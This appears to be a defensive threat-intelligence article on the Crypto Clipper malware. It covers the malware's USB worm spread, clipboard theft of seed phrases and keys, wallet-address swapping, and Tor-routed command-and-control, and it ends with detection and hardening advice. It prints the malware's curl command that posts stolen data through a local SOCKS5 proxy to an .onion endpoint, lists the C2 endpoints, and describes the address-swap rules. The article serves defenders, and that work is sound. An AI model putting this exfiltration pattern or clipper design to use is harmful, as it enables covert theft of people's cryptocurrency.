You just need the internet's most widely deployed anonymity network—and it's already listening on localhost:9050.
Crypto Clipper isn't the first clipboard stealer, and it won't be the last. But what sets this campaign apart isn't what it steals—seed phrases, private keys, wallet addresses—but how it exfiltrates that loot without raising a flag.
Instead of phoning home to a static IP, it fires up a local Tor proxy, routes every HTTP request through SOCKS5, and talks to a .onion endpoint. The result? Firewall logs stay silent. DNS queries never leave the machine. And what looks like local network chatter is, in fact, a full-blown digital heist.
Here's exactly how it works: the rename of Tor (ugate.exe), the 500ms clipboard inspection loop, address replacement tricks that fool users into sending funds to attackers, and an EVAL command that turns the clipper into a full backdoor.
This isn't theory. Microsoft Defender tracks it as Trojan:Win32/CryptoBandits.A, and it's been active since February 2026. The code is simple, the tactics are dirty—and it's working.
The proxy trick is the key insight
Most crypto stealers blast data to external IP addresses. That gives defenders easy hunting signatures: suspicious outbound connections, DNS lookups for known C2 domains, or patterns like Python spawning netcat.
Crypto Clipper dodges all of that.
Right after infection, it drops and executes a renamed Tor binary called ugate.exe. No Installer. No GUI. Just a headless proxy server listening on the standard Tor port: 127.0.0.1:9050.
Once that proxy boots, the malware doesn't call an external domain directly. Instead, it tells curl to use that local proxy:
curl --proxy socks5h://127.0.0.1:9050 -X POST https://<domain>.onion/route.php
The SOCKS5 protocol is deceptively simple. It forwards packets between client and server through a proxy, which then resolves the final destination inside the Tor network. To your host's firewall, traffic looks like this:
- Local process (cryptoclipper.exe) → localhost:9050 (SOCKS5)
There's no DNS resolution at the OS level, so tools that rely on network-sniffing or log-based detection can't see where the traffic really ends up. All you get is 127.0.0.1:9050—a port that's commonly used by legitimate privacy tools.
This is why Microsoft calls it "the strongest signal" the reverse: instead of hunting IPs or domains, defenders should hunt for local proxy abuse.
"localhost:9050 activity, especially when coupled with suspicious scripting behavior, is also valuable context for triage." — Microsoft Security Blog
But even with that signal, you have to look in the right place. That's why we dig into how the malware is really structured.
The two-part payload: worm + clipper
Crypto Clipper isn't a single binary. It's a two-stage attack:
- Worm component — spreads the infection across USB drives by creating malicious shortcuts.
- Clipper/stealer component — harvests wallet data and sends it through the SOCKS5 proxy.
Initial access comes from malicious .lnk files planted on USB drives. When a user opens what looks like financials.docx.lnk, they're launching the worm first.
The worm does three things:
- Scans the USB drive for documents (
.doc,.xlsx,.pdf). - Hides the original file and creates a matching shortcut that points to the worm payload.
- Drops encrypted payloads (two JavaScript files) into
C:\Users\Public\Documents.
Once executed, the worm sets up persistence with two scheduled tasks:
- One repeatedly scans for new USB drives and reinfects them.
- The other launches the clipboard-stealing payload on a loop.
The anti-analysis check is crude but effective: it queries Win32_Process and exits if TaskManager.exe is detected. That's enough to slow manual triage—especially when defenders see a benign-looking .lnk file and assume it's harmless.
Related threat intel: USB-based malware vectors continue to evolve. See our analysis of how a Bluetooth speaker firmware flaw turns peripherals into remote code execution devices for another example of trusted hardware becoming an attack vector.
SOCKS5 is the C2 channel—and it's not obvious
You won't see an IP in the process tree. You won't find a DNS query for the C2 domain.
Crypto Clipper uses HTTP-over-SOCKS5. That means:
- All C2 traffic goes to
127.0.0.1:9050. - The actual destination (e.g.,
xyz123.onion) is resolved by the Tor proxy. - To Windows networking APIs, it looks like local traffic to a well-known port.
Microsoft Defender XDR picks up:
Possible data exfiltration using curlBehavior:Win64/CurlOnion.STA
But most traditional endpoint protections miss this pattern because they don't correlate script execution with SOCKS5 behavior.
The C2 endpoints are simple and well-defined:
| Endpoint | Purpose |
|---|---|
/route.php | Beacon + command retrieval |
/recvf.php | Screenshot upload |
/stub.php | Payload download |
Authentication uses a victim GUID combined with geolocation (GEIP), so the attacker can track which devices are "active" and avoid re-targeting already compromised systems.
Clipboard monitoring: the 500ms loop
Once ugate.exe finishes bootstrapping (~60 seconds), the malware enters a polling loop:
- Query clipboard every ~500 milliseconds.
- Parse contents for crypto-related patterns:
- 12- or 24-word BIP39 seed phrases
- Bitcoin WIF and Ethereum private keys
- Wallet addresses (Bitcoin legacy/P2SH/taproot/Bech32, Tron, Monero)
The clipboard parser isn't clever—it scans for regex-like patterns that match common wallet formats. A seed phrase usually appears as a 12-or-24-word string, sometimes with separators like hyphens or newlines.
When it finds a match:
- The data gets saved to a local file (for fallback).
- A POST request is sent over the SOCKS5 proxy to the C2.
- If the upload fails, it retries until acknowledged—then deletes the local backup.
That retry loop is important. The malware behaves like a well-coded client: persistent, but careful not to leak data repeatedly.
Address replacement: making funds vanish silently
The most insidious feature isn't stealing keys—it's replacing them.
When a user copies a legitimate wallet address to paste into an exchange or wallet, Crypto Clipper swaps it for the attacker's address before the paste happens.
Here's how it handles different formats:
| Address Type | Pattern Match | Replacement Strategy |
|---|---|---|
Bitcoin Legacy (start: 1) | 32–36 chars | Replace first two characters |
Bitcoin P2SH (start: 3) | 32–36 chars | Replace first two characters |
Bitcoin Taproot (start: bc1p) | 40–64 chars | Replace last character |
Bitcoin Bech32 (start: bc1q) | 40–64 chars | Replace last character |
Tron (start: T) | exactly 34 chars | Replace first two characters |
Monero (start: 4 or 8) | exactly 95 chars | Replace whole string |
The replacement happens in-place, so the user sees what looks like a valid address and doesn't notice anything wrong—until they check their blockchain explorer.
The malware includes a function (checkC2Command) that can trigger address replacement in real time, making the attack more reliable than static scripts.
Remote code execution: when a clipper becomes a backdoor
Most crypto stealers are dead ends once the loot is taken. Crypto Clipper keeps talking back.
The C2 can return an EVAL response. When that happens, the malware:
- Downloads a file named
cfilefrom/stub.php. - Executes the contents as JScript code.
That turns the clipper into a lightweight backdoor—no installer needed, just arbitrary script execution. The payload can:
- Download additional malware (Ransomware-as-a-Service, information stealers)
- Elevate privileges
- Pivot to other hosts on the network
Microsoft calls this "remote code execution, elevating the threat level far beyond a standard clipper."
The EVAL feature is a forcing function for defenders: if you see script execution after clipboard activity, treat it as compromised until proven otherwise.
Screenshots aren't just for show
The malware takes five screenshots, ten seconds apart. Why?
Screen captures serve three purposes:
- Confirm wallet balance — Did the stolen seed phrase actually have funds?
- Identify hardware wallets — UI elements (Ledger/Trezor screens, MetaMask overlays) indicate device type.
- Verify address replacement — Check if the swap succeeded or if user noticed a mismatch.
Screenshots get uploaded via /recvf.php, asynchronously over Tor—no blocking, no UI stall.
The timing (10 seconds apart) suggests the attacker wants to watch wallet activity unfold, not just get a single snapshot.
Defense evasion: obfuscation layered like an onion
The malware uses multiple layers of protection:
- Installer is a Python script obfuscated with PyArmor, packaged as a standalone executable (PyInstaller).
- JavaScript payloads use dual-layer obfuscation to hinder static analysis.
- A basic anti-analysis check halts execution if Task Manager is detected.
This multi-stage approach reduces static visibility. Tools like strings or pefile can't easily pull readable strings from the obfuscated binary—forcing defenders to run it in a sandbox.
But even sandboxes miss the trick: because ugate.exe is a renamed Tor binary, behavioral sandboxing might classify it as "non-malicious" if the tool doesn't recognize that the malware also spawns curl with SOCKS5 options.
That's why behavioral hunting matters more than static analysis here.
Detection signals: look for script-to-network chains
Microsoft recommends defenders hunt for three intersecting behaviors:
- Script interpreters spawning suspicious children —
wscript.exe,cscript.exe, or PowerShell launchingcurl,cmd.exe, or screen-capture utilities. - Local SOCKS5 proxy abuse —
127.0.0.1:9050activity paired with script execution. - Clipboard inspection or wallet-address replacement — File creation patterns in
C:\Users\Public\Documentswith theGOODpath orcfile.
The most reliable detection vector:
WScript launching curl with SOCKS5 options
Microsoft Defender XDR flags:
EDR Suspicious JavaScript processPossible data exfiltration using curlBehavior:Win64/CurlOnion.STA
But generic AV won't catch this. You need endpoint detection and response (EDR) that correlates scripting behavior with network proxy usage.
Hardening recommendations: why blocking .lnk isn't enough
Blocking .lnk execution via Group Policy helps—but it's not a silver bullet.
Microsoft recommends:
- Disable AutoRun/AutoPlay for all removable media.
- Block
.lnkexecution from USB drives via GPO. - Restrict unnecessary use of
wscript.exe,cscript.exe—especially in non-admin contexts. - Review and enable Attack Surface Reduction (ASR) rules for obfuscated scripts and suspicious child-process chains.
- Hunt for localhost SOCKS5 activity (
127.0.0.1:9050) combined with PowerShell screen-capture commands.
A few final notes:
- Even if you don't use USB devices, this malware can pivot laterally via SMB shares if credentials are leaked.
- If you handle cryptocurrency, monitor clipboard access at the application layer. Some enterprise DLP tools can detect clipboard swaps.
- Test your detection coverage by replaying
curl --proxy socks5h://127.0.0.1:9050in a sandbox and seeing what alerts fire (or don't).
The real lesson: Tor isn't the villain—local proxy use is
Tor itself isn't malicious. But when malware embeds a local SOCKS5 proxy and repurposes it for command-and-control, you get something scarier than a simple stealer: an anonymous conduit that bypasses traditional security controls.
The Crypto Clipper campaign shows how small architectural choices—a renamed Tor binary, localhost:9050, HTTP-over-SOCKS5—can dramatically increase operational security for attackers while reducing detection surface for defenders.
Your job isn't to block Tor. Your job is to detect when local proxies start behaving like C2 channels.
This article used verified sources only:
- Microsoft Security Blog: Crypto Clipper uses Tor and worm-like propagation for persistence and control
- Cyber Press: Hackers Use Tor-Routed C2 and Local SOCKS5 Proxy to Control Crypto Clipper Malware
- BetaNews: Crypto Clipper uses USB drives and Tor to steal wallet data
If you found this deep dive useful, share it with your security team. The next clipper won't look like this—but the SOCKS5 trick will almost certainly persist.